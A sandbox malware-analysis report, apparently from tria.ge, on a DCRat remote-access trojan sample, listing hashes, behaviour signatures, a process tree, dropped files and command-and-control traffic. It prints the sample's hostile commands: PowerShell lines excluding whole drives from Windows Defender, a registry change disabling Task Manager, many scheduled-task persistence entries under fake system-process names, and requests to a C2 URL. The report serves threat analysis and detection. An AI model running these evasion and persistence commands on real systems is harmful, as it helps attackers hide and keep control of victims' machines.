Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

2f7a0b0d63...11.exe

windows7-x64

10

2f7a0b0d63...11.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    07/12/2024, 17:24 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2f7a0b0d633254c477f9d8650d485d11.exe

  • Size

    1.8MB

  • MD5

    2f7a0b0d633254c477f9d8650d485d11

  • SHA1

    1ce7e5c3989077d2965d9aac2a256f9930e5b98f

  • SHA256

    4a7e93517c69ba331bd816159caa16524903ea49a8a2ea2b01e89f744894e6f0

  • SHA512

    b6141e51687d39942fb04f593c7bb2c0a7ec9e0bc53200f22e4d4c94fdb5ce55aed3169ca35d014fb746089bd2087f585ad3f057931642650ff0063195054299

  • SSDEEP

    49152:VbA3GzW8NA/VUPoFVwrIIV+DJGfZ19qigh:Vbs8NA/VUPoXIV+Dwbwfh

Score
10/10
dcratdiscoveryevasionexecutioninfostealerrattrojan

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

    ratinfostealerdcrat
  • Dcrat family
    dcrat
  • Process spawned unexpected child process 24 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • UAC bypass 3 TTPs 9 IoCs
    evasiontrojan
  • DCRat payload 4 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

    rat
  • Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Disables Task Manager via registry modification
    evasion
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 2 IoCs
  • Checks whether UAC is enabled 1 TTPs 6 IoCs
    evasiontrojan
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 24 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 56 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 9 IoCs
    evasion
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\2f7a0b0d633254c477f9d8650d485d11.exe
    "C:\Users\Admin\AppData\Local\Temp\2f7a0b0d633254c477f9d8650d485d11.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2684
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\CombrowserSavesInto\8XvFTVLpT5xtXdrooGsphRu.vbe"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2696
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\CombrowserSavesInto\gFc2W3El0.bat" "
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2560
        • C:\CombrowserSavesInto\Crtmonitor.exe
          "C:\CombrowserSavesInto\Crtmonitor.exe"
          4⤵
          • UAC bypass
          • Executes dropped EXE
          • Checks whether UAC is enabled
          • Drops file in Program Files directory
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          • System policy modification
          PID:2676
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2152
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2340
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/CombrowserSavesInto/'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1304
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1536
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1788
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1596
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2488
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1840
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:700
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:912
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:268
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1124
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1916
          • C:\MSOCache\All Users\conhost.exe
            "C:\MSOCache\All Users\conhost.exe"
            5⤵
            • UAC bypass
            • Executes dropped EXE
            • Checks whether UAC is enabled
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            • System policy modification
            PID:2424
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\45fe8428-9bcd-46b3-9225-40238c613f0c.vbs"
              6⤵
                PID:2372
                • C:\MSOCache\All Users\conhost.exe
                  "C:\MSOCache\All Users\conhost.exe"
                  7⤵
                  • UAC bypass
                  • Executes dropped EXE
                  • Checks whether UAC is enabled
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • System policy modification
                  PID:1792
              • C:\Windows\System32\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fb8a7b06-2a8c-4714-a33c-25dd0b3a1cd2.vbs"
                6⤵
                  PID:780
            • C:\Windows\SysWOW64\reg.exe
              reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
              4⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry key
              PID:2756
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\CombrowserSavesInto\smss.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1932
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\CombrowserSavesInto\smss.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2632
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\CombrowserSavesInto\smss.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2900
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Adobe\Reader 9.0\Esl\WmiPrvSE.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1432
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\Reader 9.0\Esl\WmiPrvSE.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1924
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Adobe\Reader 9.0\Esl\WmiPrvSE.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:536
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\explorer.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1836
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\explorer.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1000
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\explorer.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:276
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\conhost.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1660
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\conhost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1708
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\conhost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2256
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 6 /tr "'C:\Windows\Resources\Ease of Access Themes\taskhost.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2720
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Windows\Resources\Ease of Access Themes\taskhost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1960
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 5 /tr "'C:\Windows\Resources\Ease of Access Themes\taskhost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1968
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "smsss" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\smss.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:236
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\smss.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2160
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\smss.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2948
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "smsss" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\smss.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2172
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1900
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1940
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Windows\fr-FR\dllhost.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1292
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\fr-FR\dllhost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1616
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Windows\fr-FR\dllhost.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2628

      Network

      • flag-us
        DNS
        a1056424.xsph.ru
        conhost.exe
        Remote address:
        8.8.8.8:53
        Request
        a1056424.xsph.ru
        IN A
        Response
        a1056424.xsph.ru
        IN A
        141.8.192.138
      • flag-ru
        GET
        http://a1056424.xsph.ru/95a8ba37.php?HrMsBo99TZCyxGcg3L6=FNpHggmEVePS1rn0&5vFbP6z=ukNDZvQ67f4CFMeC4nzJt7G&347b07e4e66713be0a21314e4922d859=858e460391fb5d573f4dcabbdbae854b&61dfaae7e95be6c0dec8d8d052d9e2f3=gYiNGO1MWOxMDN1QDMzcDZwQGZ1E2YjJmNzgjNhFGMlJDM1M2M2YWZ&HrMsBo99TZCyxGcg3L6=FNpHggmEVePS1rn0&5vFbP6z=ukNDZvQ67f4CFMeC4nzJt7G
        conhost.exe
        Remote address:
        141.8.192.138:80
        Request
        GET /95a8ba37.php?HrMsBo99TZCyxGcg3L6=FNpHggmEVePS1rn0&5vFbP6z=ukNDZvQ67f4CFMeC4nzJt7G&347b07e4e66713be0a21314e4922d859=858e460391fb5d573f4dcabbdbae854b&61dfaae7e95be6c0dec8d8d052d9e2f3=gYiNGO1MWOxMDN1QDMzcDZwQGZ1E2YjJmNzgjNhFGMlJDM1M2M2YWZ&HrMsBo99TZCyxGcg3L6=FNpHggmEVePS1rn0&5vFbP6z=ukNDZvQ67f4CFMeC4nzJt7G HTTP/1.1
        Accept: */*
        Content-Type: text/csv
        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
        Host: a1056424.xsph.ru
        Connection: Keep-Alive
        Response
        HTTP/1.1 403 Forbidden
        Server: openresty
        Date: Sat, 07 Dec 2024 17:24:41 GMT
        Content-Type: text/html
        Transfer-Encoding: chunked
        Connection: keep-alive
        Vary: Accept-Encoding
      • flag-ru
        GET
        http://a1056424.xsph.ru/95a8ba37.php?HrMsBo99TZCyxGcg3L6=FNpHggmEVePS1rn0&5vFbP6z=ukNDZvQ67f4CFMeC4nzJt7G&347b07e4e66713be0a21314e4922d859=858e460391fb5d573f4dcabbdbae854b&61dfaae7e95be6c0dec8d8d052d9e2f3=gYiNGO1MWOxMDN1QDMzcDZwQGZ1E2YjJmNzgjNhFGMlJDM1M2M2YWZ&HrMsBo99TZCyxGcg3L6=FNpHggmEVePS1rn0&5vFbP6z=ukNDZvQ67f4CFMeC4nzJt7G
        conhost.exe
        Remote address:
        141.8.192.138:80
        Request
        GET /95a8ba37.php?HrMsBo99TZCyxGcg3L6=FNpHggmEVePS1rn0&5vFbP6z=ukNDZvQ67f4CFMeC4nzJt7G&347b07e4e66713be0a21314e4922d859=858e460391fb5d573f4dcabbdbae854b&61dfaae7e95be6c0dec8d8d052d9e2f3=gYiNGO1MWOxMDN1QDMzcDZwQGZ1E2YjJmNzgjNhFGMlJDM1M2M2YWZ&HrMsBo99TZCyxGcg3L6=FNpHggmEVePS1rn0&5vFbP6z=ukNDZvQ67f4CFMeC4nzJt7G HTTP/1.1
        Accept: */*
        Content-Type: text/csv
        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
        Host: a1056424.xsph.ru
        Response
        HTTP/1.1 403 Forbidden
        Server: openresty
        Date: Sat, 07 Dec 2024 17:24:41 GMT
        Content-Type: text/html
        Transfer-Encoding: chunked
        Connection: keep-alive
        Vary: Accept-Encoding
      • 141.8.192.138:80
        http://a1056424.xsph.ru/95a8ba37.php?HrMsBo99TZCyxGcg3L6=FNpHggmEVePS1rn0&5vFbP6z=ukNDZvQ67f4CFMeC4nzJt7G&347b07e4e66713be0a21314e4922d859=858e460391fb5d573f4dcabbdbae854b&61dfaae7e95be6c0dec8d8d052d9e2f3=gYiNGO1MWOxMDN1QDMzcDZwQGZ1E2YjJmNzgjNhFGMlJDM1M2M2YWZ&HrMsBo99TZCyxGcg3L6=FNpHggmEVePS1rn0&5vFbP6z=ukNDZvQ67f4CFMeC4nzJt7G
        http
        conhost.exe
        3.2kB
         118.5kB
         47
        88

        HTTP Request

        GET http://a1056424.xsph.ru/95a8ba37.php?HrMsBo99TZCyxGcg3L6=FNpHggmEVePS1rn0&5vFbP6z=ukNDZvQ67f4CFMeC4nzJt7G&347b07e4e66713be0a21314e4922d859=858e460391fb5d573f4dcabbdbae854b&61dfaae7e95be6c0dec8d8d052d9e2f3=gYiNGO1MWOxMDN1QDMzcDZwQGZ1E2YjJmNzgjNhFGMlJDM1M2M2YWZ&HrMsBo99TZCyxGcg3L6=FNpHggmEVePS1rn0&5vFbP6z=ukNDZvQ67f4CFMeC4nzJt7G

        HTTP Response

        403

        HTTP Request

        GET http://a1056424.xsph.ru/95a8ba37.php?HrMsBo99TZCyxGcg3L6=FNpHggmEVePS1rn0&5vFbP6z=ukNDZvQ67f4CFMeC4nzJt7G&347b07e4e66713be0a21314e4922d859=858e460391fb5d573f4dcabbdbae854b&61dfaae7e95be6c0dec8d8d052d9e2f3=gYiNGO1MWOxMDN1QDMzcDZwQGZ1E2YjJmNzgjNhFGMlJDM1M2M2YWZ&HrMsBo99TZCyxGcg3L6=FNpHggmEVePS1rn0&5vFbP6z=ukNDZvQ67f4CFMeC4nzJt7G

        HTTP Response

        403
      • 8.8.8.8:53
        a1056424.xsph.ru
        dns
        conhost.exe
        62 B
         78 B
         1
        1

        DNS Request

        a1056424.xsph.ru

        DNS Response

        141.8.192.138

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\CombrowserSavesInto\8XvFTVLpT5xtXdrooGsphRu.vbe
        Filesize

        205B

        MD5

        f9aa9ba9ca708623a6d8eafcab82b460

        SHA1

        c75bfeade1de9cd48b255a60679a2afd045fd737

        SHA256

        0b51137a1e50b6fde4624ccff526ceb7a3fb911c811c45dcdd2fd30004993471

        SHA512

        31ef0b612045b9261ab91921336931c318e4ff853197c58d29e9741c86eeb4db859a97d413d92ac6d6d18fbeabd4ee4a1c8d4512f25468818421c4ce63a4c7a8

        Download Submit

      • C:\CombrowserSavesInto\Crtmonitor.exe
        Filesize

        1.5MB

        MD5

        4667f5be1002ce912e5590cca8da93b6

        SHA1

        2e408e483dd447b69d2e938218989265fbfdc2af

        SHA256

        fcfa3c615b1c3c703e0ebfaf3fa68093b3894f4b9b7b5b37a5283e419f44022e

        SHA512

        cdc57befaf7bad8917cc885b394f37d9dac3beabca5d07ab74cfee24f076dc088c2631ad2176dd7b9e62c555692b4c51e3280d5cf5d432ea5172db4ab8fa8c7f

        Download Submit

      • C:\CombrowserSavesInto\gFc2W3El0.bat
        Filesize

        151B

        MD5

        341c56654b4b916155226d31ae60c33b

        SHA1

        15625cf5fdc9c74cd7ab2df39433ec7a3e1587e8

        SHA256

        a5712bbb877663ebb6f017ecb478fe7c79337afa84dbda0b7b1c75120cf7b38d

        SHA512

        32509ecdeed2748d7e66d26b1d8927f6ab1ee98bd7e3c2b585c1ac697f9aaccb6efd44c0f8d30c70c8baebb1b4e07a51a5ce6e437ad155975b33a7dfe7dbf994

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\45fe8428-9bcd-46b3-9225-40238c613f0c.vbs
        Filesize

        709B

        MD5

        5bdd8c2d729372ea2965c9bd8ffa73fd

        SHA1

        288779df924fdd8bb6ec0be2ef8474459dbe99ea

        SHA256

        b5ad624bfa756d7cf9b2ff9c669de4144174820c59901fe455a5e7a2ec0c7715

        SHA512

        ca10fefcece287c1b186a697cde93fc664eac371f080f657905468002354f33406c2f04566fad9e8faa29a4132311327ebc49bb06fd4ee876af2b788b821cbc0

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\fb8a7b06-2a8c-4714-a33c-25dd0b3a1cd2.vbs
        Filesize

        485B

        MD5

        64a0b6e4c7bb63bc4f73cae7a4281af8

        SHA1

        68d858f41cbfd685babaeb847e8a879ea509ea47

        SHA256

        76eb5301567a1a174fde628fc4d59ebc270f1247eb7fb745f1cd3263cd296697

        SHA512

        0317d45fb5e8ba4dba2624284ee63de993dc2361a12cf40e842217a2fe66508723e7dd054bd6a7522071b13cce9b78f51ace943574ded6f2152b27f815cca607

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
        Filesize

        7KB

        MD5

        8b3b906e79b9a603039ebc5f02d9cf89

        SHA1

        1ec86b2c51976c7a889e2736f9c9b196d6e205eb

        SHA256

        13ab61720ae1a2e89610ea82530098a8d910fc654c5941fd8374ebc88a6b274f

        SHA512

        1b2516c77d1af39504fbc70c17b97523ea6dda4c542f3920edaf978131890af879d282c0fad680ab77b851979da22371444a801f072b43713d0170f623178fb1

        Download Submit

      • memory/1792-124-0x00000000011E0000-0x000000000136E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/2424-61-0x0000000000280000-0x000000000040E000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/2488-69-0x0000000001C10000-0x0000000001C18000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2488-63-0x000000001B710000-0x000000001B9F2000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/2676-15-0x0000000000400000-0x0000000000416000-memory.dmp

        Filesize

        88KB

        Download

      • memory/2676-26-0x0000000002230000-0x000000000223C000-memory.dmp

        Filesize

        48KB

        Download

      • memory/2676-24-0x0000000002210000-0x000000000221C000-memory.dmp

        Filesize

        48KB

        Download

      • memory/2676-23-0x0000000002200000-0x0000000002208000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2676-22-0x00000000021B0000-0x00000000021BE000-memory.dmp

        Filesize

        56KB

        Download

      • memory/2676-21-0x0000000002190000-0x000000000219A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/2676-20-0x00000000021A0000-0x00000000021AC000-memory.dmp

        Filesize

        48KB

        Download

      • memory/2676-25-0x0000000002220000-0x0000000002228000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2676-19-0x0000000002100000-0x0000000002108000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2676-18-0x00000000020F0000-0x00000000020FC000-memory.dmp

        Filesize

        48KB

        Download

      • memory/2676-17-0x00000000008C0000-0x00000000008CC000-memory.dmp

        Filesize

        48KB

        Download

      • memory/2676-16-0x0000000000420000-0x000000000042A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/2676-14-0x00000000003E0000-0x00000000003FC000-memory.dmp

        Filesize

        112KB

        Download

      • memory/2676-13-0x00000000001D0000-0x000000000035E000-memory.dmp

        Filesize

        1.6MB

        Download

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.